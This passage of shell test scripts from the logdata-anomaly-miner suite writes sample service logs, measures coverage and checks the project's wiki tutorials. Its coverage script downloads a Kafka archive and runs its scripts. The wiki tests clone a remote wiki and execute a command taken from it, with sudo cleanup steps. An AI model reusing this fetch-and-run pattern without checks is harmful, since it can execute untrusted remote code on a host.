>> $LOGFILE ;; NtpParsingModel) echo "ntpd[8457]: Listen and drop on 0 v6wildcard [::]:123" > $LOGFILE echo "ntpd[8457]: Listen and drop on 1 v4wildcard 0.0.0.0:123" >> $LOGFILE echo "ntpd[8457]: Listen normally on 2 lo 127.0.0.1:123" >> $LOGFILE echo "ntpd[8457]: Listen normally on 3 eth0 1.2.2.19:123" >> $LOGFILE echo "ntpd[8457]: Listening on routing socket on fd #20 for interface updates" >> $LOGFILE echo "ntpd[21152]: logging to file /var/log/ntplog" >> $LOGFILE echo "ntpd[22760]: Soliciting pool server 78.41.116.113" >> $LOGFILE echo "ntpd[23165]: ntpd 4.2.8p12@1.3728-o (1): Starting" >> $LOGFILE echo "ntpd[23165]: Command line: ntpd" >> $LOGFILE echo "ntpd[23165]: must be run as root, not uid 1000" >> $LOGFILE echo "ntpd[23170]: proto: precision = 0.045 usec (-24)" >> $LOGFILE echo "ntpd[23170]: leapsecond file ('/usr/share/zoneinfo/leap-seconds.list'): good hash signature" >> $LOGFILE echo "ntpd[23170]: leapsecond file ('/usr/share/zoneinfo/leap-seconds.list'): loaded, expire=2021-12-28T00:00:00Z last=2017-01-01T00:00:00Z ofs=37" >> $LOGFILE echo "ntpd[23170]: unable to bind to wildcard address :: - another process may be running - EXITING" >> $LOGFILE ;; RsyslogParsingModel) echo "rsyslogd: [origin software=\"rsyslogd\" swVersion=\"8.4.2\" x-pid=\"1812\" x-info=\"http://www.rsyslog.com\"] rsyslogd was HUPed" > $LOGFILE echo "rsyslogd0: action 'action 17' resumed (module 'builtin:ompipe') [try http://www.rsyslog.com/e/0 ]" >> $LOGFILE echo "rsyslogd-2359: action 'action 17' resumed (module 'builtin:ompipe') [try http://www.rsyslog.com/e/2359 ]" >> $LOGFILE echo "rsyslogd-2007: action 'action 17' suspended, next retry is Sun May 24 06:56:28 2015 [try http://www.rsyslog.com/e/2007 ]" >> $LOGFILE echo "rsyslogd: rsyslogd's groupid changed to 109" >> $LOGFILE echo "rsyslogd: rsyslogd's userid changed to 104" >> $LOGFILE echo "rsyslogd: [origin software=\"rsyslogd\" swVersion=\"8.2001.0\" x-pid=\"28018\" x-info=\"https://www.rsyslog.com\"] start" >> $LOGFILE 
echo "rsyslogd: [origin software=\"rsyslogd\" swVersion=\"8.2001.0\" x-pid=\"542\" x-info=\"https://www.rsyslog.com\"] rsyslogd was HUPed" >> $LOGFILE echo "rsyslogd-2222: command 'KLogPermitNonKernelFacility' is currently not permitted - did you already set it via a RainerScript command (v6+ config)? [v8.16.0 try http://www.rsyslog.com/e/2222 ]" >> $LOGFILE ;; SshdParsingModel) echo "sshd[35618]: Server listening on 0.0.0.0 port 22." > $LOGFILE echo "sshd[35619]: Failed password for someuser from 1.1.1.1 port 1372 ssh2" >> $LOGFILE echo "sshd[35619]: Accepted password for someuser from 1.1.1.1 port 1372 ssh2" >> $LOGFILE echo "sshd[36108]: Accepted publickey for someuser from 1.1.1.2 port 51590 ssh2" >> $LOGFILE echo "sshd[54798]: error: maximum authentication attempts exceeded for root from 122.121.51.193 port 59928 ssh2 [preauth]" >> $LOGFILE echo "sshd[54798]: Disconnecting authenticating user root 122.121.51.193 port 59928: Too many authentication failures [preauth]" >> $LOGFILE echo "sshd[5197]: Accepted publickey for fred from 192.0.2.60 port 59915 ssh2: RSA SHA256:5xyQ+PG1Z3CIiShclJ2iNya5TOdKDgE/HrOXr21IdOo" >> $LOGFILE echo "sshd[50140]: Accepted publickey for fred from 192.0.2.60 port 44456 ssh2: ECDSA-CERT SHA256:qGl9KiyXrG6mIOo1CT01oHUvod7Ngs5VMHM14DTbxzI ID foobar (serial 9624) CA ED25519 SHA256:fZ6L7TlBLqf1pGWzkcQMQMFZ+aGgrtYgRM90XO0gzZ8" >> $LOGFILE echo "sshd[5104]: Accepted publickey for fred from 192.0.2.60 port 60594 ssh2: RSA e8:31:68:c7:01:2d:25:20:36:8f:50:5d:f9:ee:70:4c" >> $LOGFILE echo "sshd[252]: Connection closed by authenticating user fred 192.0.2.60 port 44470 [preauth]" >> $LOGFILE echo "sshd[90593]: fatal: Timeout before authentication for 192.0.2.60 port 44718" >> $LOGFILE echo "sshd[252]: error: Certificate invalid: expired" >> $LOGFILE echo "sshd[90593]: error: Certificate invalid: not yet valid" >> $LOGFILE echo "sshd[98884]: error: Certificate invalid: name is not a listed principal" >> $LOGFILE echo "sshd[2420]: cert: 
Authentication tried for fred with valid certificate but not from a permitted source address (192.0.2.61)." >> $LOGFILE echo "sshd[2420]: error: Refused by certificate options" >> $LOGFILE echo "sshd[26299]: Failed none for fred from 192.0.2.60 port 47366 ssh2" >> $LOGFILE echo "sshd[26299]: User child is on pid 21613" >> $LOGFILE echo "sshd[21613]: Changed root directory to \"/home/fred\"" >> $LOGFILE echo "sshd[21613]: subsystem request for sftp" >> $LOGFILE echo "sshd[83709]: packet_write_poll: Connection from 192.0.2.97 port 57608: Host is down" >> $LOGFILE echo "sshd[9075]: debug1: Got 100/147 for keepalive" >> $LOGFILE echo "sshd[73960]: debug2: channel 0: request keepalive@openssh.com confirm 1" >> $LOGFILE echo "sshd[73960]: debug3: send packet: type 98" >> $LOGFILE echo "sshd[73960]: debug3: receive packet: type 100" >> $LOGFILE echo "sshd[73960]: debug1: Got 100/22 for keepalive" >> $LOGFILE echo "sshd[15780]: debug1: do_cleanup" >> $LOGFILE echo "sshd[48675]: debug1: session_pty_cleanup: session 0 release /dev/ttyp0" >> $LOGFILE echo "sshd[29235]: error: Authentication key RSA SHA256:jXEPmu4thnubqPUDcKDs31MOVLQJH6FfF1XSGT748jQ revoked by file /etc/ssh/ssh_revoked_keys" >> $LOGFILE echo "sshd[38594]: Invalid user ubnt from 201.179.249.231 port 52471" >> $LOGFILE echo "sshd[38594]: Failed password for invalid user ubnt from 201.179.249.231 port 52471 ssh2" >> $LOGFILE echo "sshd[38594]: error: maximum authentication attempts exceeded for invalid user ubnt from 201.179.249.231 port 52471 ssh2 [preauth]" >> $LOGFILE echo "sshd[38594]: Disconnecting invalid user ubnt 201.179.249.231 port 52471: Too many authentication failures [preauth]" >> $LOGFILE echo "sshd[93126]: Failed none for invalid user admin from 125.64.94.136 port 27586 ssh2" >> $LOGFILE echo "sshd[9265]: Accepted password for fred from 127.0.0.1 port 40426 ssh2" >> $LOGFILE echo "sshd[5613]: Invalid user cloud from ::1 port 57404" >> $LOGFILE echo "sshd[5613]: Failed password for invalid user 
cloud from ::1 port 57404 ssh2" >> $LOGFILE echo "sshd[5613]: Connection closed by invalid user cloud ::1 port 57404 [preauth]" >> $LOGFILE echo "sshd[3545]: pam_succeed_if(sshd:auth): requirement \"uid >= 1000\" not met by user \"root\"" >> $LOGFILE echo "sshd[3545]: pam_unix(sshd:session): session opened for user root by (uid=0)" >> $LOGFILE echo "sshd[3545]: Received disconnect from ::1: 11: disconnected by user" >> $LOGFILE echo "sshd[3545]: pam_unix(sshd:session): session closed for user root" >> $LOGFILE echo "sshd[4182]: error: Could not load host key: /etc/ssh/ssh_host_dsa_key" >> $LOGFILE ;; SsmtpParsingModel) echo "sSMTP[24391]: /usr/sbin/sendmail sent mail for raul" > $LOGFILE ;; SuSessionParsingModel) echo "su[10710]: Successful su for user by root" > $LOGFILE echo "su[10710]: + ??? root:user" >> $LOGFILE echo "su[10710]: pam_unix(su:session): session opened for user user by (uid=0)" >> $LOGFILE echo "su[10710]: pam_unix(su:session): session closed for user user" >> $LOGFILE ;; SyslogPreambleModel) echo "Feb 29 00:01:41 mail-0 " > $LOGFILE echo "Mar 1 06:25:38 mail " >> $LOGFILE ;; SystemdParsingModel) echo "systemd[1]: phpsessionclean.service: Succeeded." > $LOGFILE echo "systemd[1]: Finished Clean php session files." >> $LOGFILE echo "systemd[1]: logrotate.service: Succeeded." >> $LOGFILE echo "systemd[1]: Finished Rotate log files." >> $LOGFILE echo "systemd[1]: man-db.service: Succeeded." >> $LOGFILE echo "systemd[1]: Finished Daily man-db regeneration." >> $LOGFILE echo "systemd[1]: Finished Ubuntu Advantage APT and MOTD Messages." >> $LOGFILE echo "systemd[1]: Finished Refresh fwupd metadata and update motd." >> $LOGFILE echo "systemd[1]: Finished Daily apt download activities." >> $LOGFILE echo "systemd[1]: Starting Daily apt upgrade and clean activities..." >> $LOGFILE echo "systemd[1]: Finished Daily apt upgrade and clean activities." >> $LOGFILE echo "systemd[1]: anacron.service: Killing process 39123 (update-notifier) with signal SIGKILL." 
>> $LOGFILE echo "systemd[1]: Starting PackageKit Daemon..." >> $LOGFILE echo "systemd[1]: Started PackageKit Daemon." >> $LOGFILE echo "systemd[1]: Reloading." >> $LOGFILE echo "systemd[2318]: var-lib-docker-overlay2-check\x2doverlayfs\x2dsupport037009939-merged.mount: Succeeded." >> $LOGFILE echo "systemd[2318]: Started VTE child process 54668 launched by gnome-terminal-server process 2984." >> $LOGFILE echo "systemd-logind[2445]: New session 2172664 of user dbi_backup." >> $LOGFILE echo "systemd-logind[760]: Session 230 logged out. Waiting for processes to exit." >> $LOGFILE echo "systemd-logind[760]: Removed session 230." >> $LOGFILE echo "systemd-logind[760]: New session 231 of user egoebelbecker." >> $LOGFILE echo "systemd-logind[467]: Failed to abandon session scope: Transport endpoint is not connected" >> $LOGFILE ;; TomcatParsingModel) # model is not updated to the latest version and therefore not tested. rm $LOGFILE touch $LOGFILE ;; UlogdParsingModel) echo "ulogd[4655]: id=\"2001\" severity=\"info\" sys=\"SecureNet\" sub=\"packetfilter\" name=\"Packet dropped\" action=\"drop\" fwrule=\"60001\" initf=\"eth0\" srcmac=\"******\" dstmac=\"******x\" srcip=\"10.64.0.22\" dstip=\"10.64.0.10\" proto=\"6\" length=\"52\" tos=\"0x00\" prec=\"0x00\" ttl=\"128\" srcport=\"443\" dstport=\"56174\" tcpflags=\"ACK FIN\"" > $LOGFILE echo "ulogd[4655]: id=\"2001\" severity=\"info\" sys=\"SecureNet\" sub=\"packetfilter\" name=\"Packet dropped\" action=\"drop\" fwrule=\"60001\" initf=\"eth0\" srcmac=\"******xx\" dstmac=\"******x\" srcip=\"10.64.0.22\" dstip=\"10.64.0.10\" proto=\"6\" length=\"153\" tos=\"0x00\" prec=\"0x00\" ttl=\"128\" srcport=\"443\" dstport=\"56174\" tcpflags=\"ACK PSH FIN\"" >> $LOGFILE ;; DnsParsingModel) echo "Jan 20 11:21:42 dnsmasq[3326]: started, version 2.79 cachesize 150" > $LOGFILE echo "Jan 20 11:21:42 dnsmasq[3326]: compile time options: IPv6 GNU-getopt DBus i18n IDN DHCP DHCPv6 no-Lua TFTP conntrack ipset auth nettlehash DNSSEC loop-detect 
inotify" >> $LOGFILE echo "Jan 20 11:21:42 dnsmasq[3326]: using nameserver 8.8.8.8#53" >> $LOGFILE echo "Jan 20 11:21:42 dnsmasq[3326]: using nameserver 192.168.230.122#53 for domain email-19.kennedy-mendoza.info" >> $LOGFILE echo "Jan 20 11:21:42 dnsmasq[3326]: read /etc/hosts - 7 addresses" >> $LOGFILE echo "Jan 20 11:21:55 dnsmasq[3414]: query[SRV] _http._tcp.archive.ubuntu.com from 192.168.230.4" >> $LOGFILE echo "Jan 20 11:21:55 dnsmasq[3414]: forwarded _http._tcp.archive.ubuntu.com to 8.8.8.8" >> $LOGFILE echo "Jan 20 11:21:55 dnsmasq[3414]: reply archive.ubuntu.com is 91.189.88.152" >> $LOGFILE echo "Jan 20 11:23:40 dnsmasq[3326]: cached debian.map.fastlydns.net is 199.232.138.132" >> $LOGFILE echo "Jan 20 11:21:42 inet-dns dnsmasq[1969]: exiting on receipt of SIGTERM" >> $LOGFILE echo "Jan 20 13:47:14 dnsmasq[3326]: nameserver 127.0.0.1 refused to do a recursive query" >> $LOGFILE echo "Jan 21 07:05:20 dnsmasq[3468]: failed to access /etc/dnsmasq.d/dnsmasq-resolv.conf: No such file or directory" >> $LOGFILE echo "Jan 24 03:56:53 dnsmasq[15084]: config version.bind is " >> $LOGFILE ;; OpenVpnParsingModel) echo "2022-01-21 00:09:11 jhall/192.168.230.165:46011 TLS: soft reset sec=3308/3308 bytes=45748/-1 pkts=649/0" > $LOGFILE echo "2022-01-21 00:09:11 jhall/192.168.230.165:46011 VERIFY OK: depth=1, C=AT, ST=Vienna, L=Vienna, O=Some Organisation GmbH, CN=OpenVPN CA, emailAddress=admin@organisation.cyberrange.at" >> $LOGFILE echo "2022-01-21 00:09:11 jhall/192.168.230.165:46011 VERIFY KU OK" >> $LOGFILE echo "2022-01-21 00:09:11 jhall/192.168.230.165:46011 Validating certificate extended key usage" >> $LOGFILE echo "2022-01-21 00:09:11 jhall/192.168.230.165:46011 ++ Certificate has EKU (str) TLS Web Client Authentication, expects TLS Web Client Authentication" >> $LOGFILE echo "2022-01-21 00:09:11 jhall/192.168.230.165:46011 peer info: IV_VER=2.4.4" >> $LOGFILE echo "2022-01-21 00:09:11 jhall/192.168.230.165:46011 peer info: IV_PLAT=linux" >> $LOGFILE echo 
"2022-01-21 00:09:11 jhall/192.168.230.165:46011 peer info: IV_PROTO=2" >> $LOGFILE echo "2022-01-21 00:09:11 jhall/192.168.230.165:46011 peer info: IV_LZ4=1" >> $LOGFILE echo "2022-01-21 00:09:11 jhall/192.168.230.165:46011 peer info: IV_COMP_STUB=1" >> $LOGFILE echo "2022-01-21 00:09:11 jhall/192.168.230.165:46011 peer info: IV_TCPNL=1" >> $LOGFILE echo "2022-01-21 00:09:11 jhall/192.168.230.165:46011 Outgoing Data Channel: Cipher 'AES-256-CBC' initialized with 256 bit key" >> $LOGFILE echo "2022-01-21 03:49:44 jhall/192.168.230.165:46011 TLS: soft reset sec=3309/3308 bytes=45892/-1 pkts=651/0" >> $LOGFILE echo "2022-01-21 06:30:01 192.168.230.95:60795 TLS: Initial packet from [AF_INET]192.168.230.95:60795, sid=30d47335 8140d551" >> $LOGFILE echo "2022-01-21 06:30:01 192.168.230.95:60795 peer info: IV_NCP=2" >> $LOGFILE echo "2022-01-21 06:30:01 192.168.230.95:60795 [twhite] Peer Connection Initiated with [AF_INET]192.168.230.95:60795" >> $LOGFILE echo "2022-01-21 06:30:01 twhite/192.168.230.95:60795 MULTI_sva: pool returned IPv4=10.9.0.6, IPv6=(Not enabled)" >> $LOGFILE echo "2022-01-21 06:30:01 twhite/192.168.230.95:60795 MULTI: Learn: 10.9.0.6 -> twhite/192.168.230.95:60795" >> $LOGFILE echo "2022-01-21 06:30:01 twhite/192.168.230.95:60795 MULTI: primary virtual IP for twhite/192.168.230.95:60795: 10.9.0.6" >> $LOGFILE echo "2022-01-21 06:30:03 twhite/192.168.230.95:60795 PUSH: Received control message: 'PUSH_REQUEST'" >> $LOGFILE echo "2022-01-21 06:30:03 twhite/192.168.230.95:60795 SENT CONTROL [twhite]: 'PUSH_REPLY,redirect-gateway def1,block-outside-dns,route 10.9.0.1,topology net30,ping 10,ping-restart 120,ifconfig 10.9.0.6 10.9.0.5,peer-id 0,cipher AES-256-CBC' (status=1)" >> $LOGFILE echo "2022-01-21 08:09:33 jhall/192.168.230.165:46011 [jhall] Inactivity timeout (--ping-restart), restarting" >> $LOGFILE echo "2022-01-21 08:09:33 jhall/192.168.230.165:46011 SIGUSR1[soft,ping-restart] received, client-instance restarting" >> $LOGFILE echo "2022-01-23 
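14:54:54 jhall/192.168.230.165:59814 TLS Error: TLS key negotiation failed to occur within 60 seconds (check your network connectivity)" >> $LOGFILE echo "2022-01-23 14:54:54 jhall/192.168.230.165:59814 TLS Error: TLS handshake failed" >> $LOGFILE echo "2022-01-23 14:54:54 jhall/192.168.230.165:59814 TLS: move_session: dest=TM_LAME_DUCK src=TM_ACTIVE reinit_src=1" >> $LOGFILE ;; *) echo "Unknown parser config '$BN' was found! Please extend these tests. Failing.." exit_code=2 continue ;; esac cat >> $CONFIG_PATH < $OUT 2>&1 exit_code=$? if [[ `grep -ic "VerboseUnparsedAtomHandler" $OUT` != 0 && $BN != "AminerParsingModel" ]] || [[ `grep -o '\bVerboseUnparsedAtomHandler\b' $OUT | wc -l` > 5 ]] || `grep -Fq "Traceback" $OUT` || `grep -Fq "{'Parser'" $OUT` || `grep -Fq "FATAL" $OUT` || `grep -Fq "Config-Error" $OUT`; then echo "Failed Test in $filename" exit_code=1 cat $OUT echo echo fi done rm $CONFIG_PATH exit $exit_code
logdata-anomaly-miner-2.8.0/aecid-testsuite/runCoverageTests.sh000077500000000000000000000022521500476301700246440ustar00rootroot00000000000000
#!/bin/bash
# Run the unit tests twice under coverage.py (statement coverage, then branch
# coverage) against a Kafka/ZooKeeper instance that is downloaded and started
# on the fly, print both reports and remove everything that was created.
# Expects KAFKA_URL and KAFKA_VERSIONSTRING (the directory name inside the
# archive) from ./config; KAFKA_SHA256 is optional and enables a digest check.
source config

# Refuse to run with an unset version string: the cleanup at the end does
# "rm -r $KAFKA_VERSIONSTRING/", which would otherwise expand to "/".
if [ -z "$KAFKA_URL" ] || [ -z "$KAFKA_VERSIONSTRING" ]; then
  echo "KAFKA_URL and KAFKA_VERSIONSTRING must be set in ./config" >&2
  exit 1
fi

# Supply-chain note: this archive is fetched at test time and its scripts are
# executed below. -f makes curl fail on an HTTP error instead of saving an
# error page that tar would then try to unpack; the digest check only runs
# when a pinned KAFKA_SHA256 is configured.
if ! curl -fsSL "$KAFKA_URL" --output kafka.tgz; then
  echo "Download of $KAFKA_URL failed" >&2
  exit 1
fi
if [ -n "$KAFKA_SHA256" ]; then
  if ! echo "$KAFKA_SHA256  kafka.tgz" | sha256sum -c --status; then
    echo "kafka.tgz does not match KAFKA_SHA256; aborting" >&2
    rm -f kafka.tgz
    exit 1
  fi
fi
tar xvf kafka.tgz > /dev/null
rm kafka.tgz

# Start ZooKeeper first and give it a moment before the broker connects to it.
"$KAFKA_VERSIONSTRING"/bin/zookeeper-server-start.sh "$KAFKA_VERSIONSTRING"/config/zookeeper.properties > /dev/null &
sleep 1
"$KAFKA_VERSIONSTRING"/bin/kafka-server-start.sh "$KAFKA_VERSIONSTRING"/config/server.properties > /dev/null &

# Collect the reports in a private temporary file instead of a fixed,
# predictable /tmp path that another local user could pre-create.
REPORT=$(mktemp)

# First pass: statement coverage.
sudo coverage run --source=./aminer -m unittest discover -s unit -p '*Test.py' > /dev/null
exit_code1=$?
echo 'Statement Coverage:' > "$REPORT"
sudo coverage report >> "$REPORT"

# Second pass: branch coverage.
sudo coverage run --source=./aminer --branch -m unittest discover -s unit -p '*Test.py' > /dev/null
exit_code2=$?
echo 'Branch Coverage:' >> "$REPORT"
sudo coverage report >> "$REPORT"
cat "$REPORT"
rm -f "$REPORT"

# Clean up artefacts left behind by the tests (mail spool, unix sockets).
test -e /var/mail/mail && sudo rm -f /var/mail/mail
sudo rm -f /tmp/test4unixSocket.sock
sudo rm -f /tmp/test5unixSocket.sock
sudo rm -f /tmp/test6unixSocket.sock

# Stop and remove Kafka/ZooKeeper together with their data directories.
"$KAFKA_VERSIONSTRING"/bin/kafka-server-stop.sh > /dev/null
"$KAFKA_VERSIONSTRING"/bin/zookeeper-server-stop.sh > /dev/null
sudo rm -r "$KAFKA_VERSIONSTRING"/
sudo rm -r /tmp/zookeeper
sudo rm -r /tmp/kafka-logs

# Fail if either test pass failed.
if [[ "$exit_code1" -ne 0 || "$exit_code2" -ne 0 ]]; then
  exit 1
fi
exit 0
logdata-anomaly-miner-2.8.0/aecid-testsuite/runElasticSearchWikiTest.sh000077500000000000000000000050401500476301700262620ustar00rootroot00000000000000
#!/bin/bash
. ./testFunctions.sh
##################################################################
# Description of the test. Line numbers are also considering starting lines with ```, so they are incremented by one compared to the text itself.
# 1.) Write second line of 3rd to 4th ``` into LOG.
# 2.) Write the config to CFG_PATH from 1st ```yaml to 5th ```.
# 3.) Replace LogResourceList path with LOG in CFG_PATH and the report interval of the ParserCount.
# 4.) Extract the CMD between 10th and 11th ```
# 5.) Compare the results with the outputs between 12th and 13th ```.
##################################################################
# Optional first argument selects the wiki branch to test against.
BRANCH=main
if [ $# -gt 0 ]
then
  BRANCH=$1
fi
INPUT=logdata-anomaly-miner.wiki/Importing-logs-via-ElasticSearch-interface.md
OUT=/tmp/out.txt
LOG=/tmp/access.log
CFG_PATH=/etc/aminer/config.yml
TMPFILE1=/tmp/tmpfile1
TMPFILE2=/tmp/tmpfile2
# extract the file from the development branch of the wiki project.
# NOTE: the configuration and the command this test later runs are parsed out
# of this clone, so the wiki branch is a trust boundary of the test; pin BRANCH
# to a reviewed commit when running it unattended.
git clone https://github.com/ait-aecid/logdata-anomaly-miner.wiki.git 2> /dev/null
cd logdata-anomaly-miner.wiki 2> /dev/null
git checkout $BRANCH > /dev/null 2>&1
cd ..
exit_code=0
# write log data into file (1.)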
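awk '/^```$/ && ++n == 3, /^```$/ && n++ == 4' < $INPUT | sed '/^```/ d' > $LOG
sed -i '1d' $LOG
# write the config to CFG_PATH (2.)
awk '/^```yaml$/ && ++n == 1, /^```$/' < $INPUT | sed '/^```/ d' | sudo tee $CFG_PATH > /dev/null
# replace LogResourceList (3.)
# Edit in place: "sed FILE | sudo tee FILE" lets tee truncate the file while
# sed may still be reading it, which can silently leave an empty config.
sudo sed -i "s?unix:///var/lib/aelastic/aminer.sock?file:///${LOG}?g" $CFG_PATH
sudo sed -i "s?report_interval: 5?report_interval: 555555555?g" $CFG_PATH
# extract CMD (4.)
# The command executed below is taken verbatim from the wiki page checked out
# earlier (the part after the "$ " prompt); the wiki branch is therefore the
# trust boundary of this test.
awk '/^```$/ && ++n == 10, /^```$/ && n++ == 11' < $INPUT | sed '/^```/ d' > $OUT
CMD=$(cat $OUT)
IFS='$' read -ra ADDR <<< "$CMD"
CMD="${ADDR[1]}"
runAminerUntilEnd "$CMD" "$LOG" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT"
OUTPUT=$(cat $OUT)
# compare results (5.)
IN=$(awk '/^```$/ && ++n == 12, /^```$/ && n++ == 13' < $INPUT | sed '/^```/ d')
# Start from empty files: both are filled with ">>" below, so leftovers from an
# aborted earlier run would otherwise corrupt the comparison, and cmp would
# fail outright if one side produced no lines at all.
: > $TMPFILE1
: > $TMPFILE2
# Lines 52 and 54 are excluded on both sides (presumably run-specific values
# such as timestamps -- not verified here).
i=0
while IFS= read -r line
do
  if [[ $i -ne 52 && $i -ne 54 ]]; then
    echo "$line" >> $TMPFILE1
  fi
  i=$(($i+1))
done <<< "$IN"
i=0
while IFS= read -r line
do
  if [[ $i -ne 52 && $i -ne 54 ]]; then
    echo "$line" >> $TMPFILE2
  fi
  i=$(($i+1))
done <<< "$OUTPUT"
cmp --silent $TMPFILE1 $TMPFILE2
res=$?
if [[ $res != 0 ]]; then
  cat $TMPFILE1
  echo
  echo "Failed Test in 5."
  echo
  cat $TMPFILE2
fi
exit_code=$((exit_code | res))
rm $TMPFILE1
rm $TMPFILE2
rm $OUT
rm $LOG
sudo rm -r logdata-anomaly-miner.wiki
exit $exit_code
logdata-anomaly-miner-2.8.0/aecid-testsuite/runFlake8.sh000077500000000000000000000001721500476301700231770ustar00rootroot00000000000000
#!/bin/bash
# Lint the installed aminer tree with the repository's flake8 configuration
# and propagate flake8's exit status.
python3 -m flake8 /usr/lib/logdata-anomaly-miner --config /home/aminer/logdata-anomaly-miner/.flake8
exit $?
logdata-anomaly-miner-2.8.0/aecid-testsuite/runGettingStarted.sh000077500000000000000000000165171500476301700250250ustar00rootroot00000000000000
#!/bin/bash
. ./testFunctions.sh
##################################################################
# Description of the test.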
Line numbers are also considering starting lines with ```, so they are incremented by one compared to the text itself. # 1.) Read the first log line between the 4th and 5th ``` in the third line and save it to /var/log/apache2/access.log # 2.) Link the ApacheAccessLog by running the command between the 5th ```bash and 7th ``` after "$ ". # 3.) Extract the first aminer command and the CFG_PATH between 9th and 10th ```. # 4.) Write the config to CFG_PATH from 1st ```yaml to 8th ```. # 5.) Extract the resulting outputs between 9th and 10th ``` by comparing following lines with the ones from the output: # - 6,34 with 2,30 # - 37,39 with 37,39 # 6.) Compare the outputs between 9th and 10th ``` and the outputs between 19th and 20th ```. # 7.) Write the config to CFG_PATH from 2nd ```yaml to 11th ```. # 8.) Read 1st ```python to 14th ``` and compare the ApacheAccessModel with the ApacheAccessModel in source/root/etc/aminer/conf-available/generic/ApacheAccessModel.py # 9.) Write new lines to the access.log from the 4th and 5th line between 21st and 22nd ```. # 10.) Read the new command without clearing the persisted data from the 2nd line between 23rd and 24th ```. Run the command and compare the lines 4,32 with the output lines 2,30. # 11.) Read all log lines between the 27th and 28th ``` and save it to /var/log/apache2/access.log # 12.) Extract the resulting outputs and CFG_PATH (1st line) between 30th and 31st ``` by comparing following lines with the ones from the output: # - 4,32 with 2,30 # - 35,37 with 33,35 # - 40,42 with 38,40 # - 45,47 with 43,45 # - 50,52 with 48,50 # - 55,57 with 53,55 # - 60,62 with 58,60 # 13.) Write the config to CFG_PATH from 5th ```yaml to 29th ```. # 14.) Set LearnMode to False. # 15.) Parse the last CMD between 34th and 35th ```. # 16.) 
Append the new logline and extract the resulting outputs between 40th and 41st ``` by comparing following lines with the ones from the output: # - 4,6 with 2,4 ################################################################## BRANCH=main if [ $# -gt 0 ] then BRANCH=$1 fi INPUT_FILE=logdata-anomaly-miner.wiki/Getting-started-\(tutorial\).md OUT=/tmp/out.txt OUT2=/tmp/out2.txt LOG=/tmp/access.log # extract the file from the development branch of the wiki project. # the first ```yaml script is searched for. git clone https://github.com/ait-aecid/logdata-anomaly-miner.wiki.git 2> /dev/null cd logdata-anomaly-miner.wiki 2> /dev/null git checkout $BRANCH > /dev/null 2>&1 cd .. sed -i "s?/var/log/apache2/access.log?/tmp/access.log?g" $INPUT_FILE # create log file (1.) awk '/^```$/ && ++n == 4, /^```$/ && n++ == 5' < $INPUT_FILE > $LOG sed -i -n '3p' $LOG # link the ApacheAccessModel (2.) awk '/^```bash$/ && ++n == 5, /^```$/' < $INPUT_FILE > $OUT CMD=$(sed -n '2p' < $OUT) CMD=${CMD#*$ } $CMD 2> /dev/null # load the aminer command. (3.) awk '/^```$/ && ++n == 9, /^```$/ && n++ == 10' < $INPUT_FILE > $OUT CMD=$(sed -n '4p' < $OUT) CMD=${CMD#*$ } CFG_PATH=/${CMD#*/} # write the yaml config. (4.) awk '/^```yaml$/ && ++n == 1, /^```$/' < $INPUT_FILE | sed '/^```/ d' | sudo tee $CFG_PATH > /dev/null # extract resulting outputs and compare them. (5.) OUT1=$(sed -n '6,34p' < $OUT) OUT2=$(sed -n '37,39p' < $OUT) runAminerUntilEnd "$CMD -C" "$LOG" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi IN1=$(sed -n '2,30p' < $OUT) IN2=$(sed -n '33,37p' < $OUT) compareStrings "$OUT1" "$IN1" "Failed Test in 5." exit_code=$((exit_code | $?)) compareStrings "$OUT2" "$IN2" "Failed Test in 5." exit_code=$((exit_code | $?)) # compare the outputs (6.) 
awk '/^```$/ && ++n == 9, /^```$/ && n++ == 10' < $INPUT_FILE > $OUT OUT1=$(sed -n '5,$p' < $OUT) awk '/^```$/ && ++n == 19, /^```$/ && n++ == 20' < $INPUT_FILE > $OUT OUT2=$(sed -n '2,$p' < $OUT) compareStrings "$OUT1" "$OUT2" "Failed Test in 6." exit_code=$((exit_code | $?)) # write the second yaml config (7.) awk '/^```yaml$/ && ++n == 2, /^```$/' < $INPUT_FILE | sed '/^```/ d' | sudo tee $CFG_PATH > /dev/null # compare ApacheAccessModel (8.) awk '/^```python$/ && ++n == 1, /^```$/' < $INPUT_FILE | sed '/^```/ d' > $OUT OUT1=$(cat $OUT) IN1=$(cat ../source/root/etc/aminer/conf-available/generic/ApacheAccessModel.py) compareStrings "$OUT1" "$IN1" "Failed Test in 8." exit_code=$((exit_code | $?)) # write new loglines. (9.) awk '/^```$/ && ++n == 21, /^```$/ && n++ == 22' < $INPUT_FILE > $LOG OUT1=$(sed -n '4,5p' < $LOG) echo "$OUT1" > $LOG # read new command (10.) awk '/^```$/ && ++n == 23, /^```$/ && n++ == 24' < $INPUT_FILE > $OUT CMD=$(sed -n '2p' < $OUT) CMD=${CMD#*$ } OUT1=$(sed -n '4,6p' < $OUT) runAminerUntilEnd "$CMD" "$LOG" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" if [[ $? != 0 ]]; then exit_code=1 fi IN1=$(sed -n '2,4p' < $OUT) compareStrings "$OUT1" "$IN1" "Failed Test in 10." exit_code=$((exit_code | $?)) # rewrite access.log (11.) awk '/^```$/ && ++n == 27, /^```$/ && n++ == 28' < $INPUT_FILE | sed '/^```/ d' > $LOG # extract resulting outputs and CFG_PATH and compare them. (12.) awk '/^```$/ && ++n == 30, /^```$/ && n++ == 31' < $INPUT_FILE > $OUT CMD=$(sed -n '2p' < $OUT) CMD=${CMD#*$ } CFG_PATH=/${CMD#*/} OUT1=$(sed -n '4,32p' < $OUT) OUT2=$(sed -n '35,37p' < $OUT) OUT3=$(sed -n '40,42p' < $OUT) OUT4=$(sed -n '45,47p' < $OUT) OUT5=$(sed -n '50,52p' < $OUT) OUT6=$(sed -n '55,57p' < $OUT) OUT7=$(sed -n '60,62p' < $OUT) # test the fifth yaml config. (13.) 
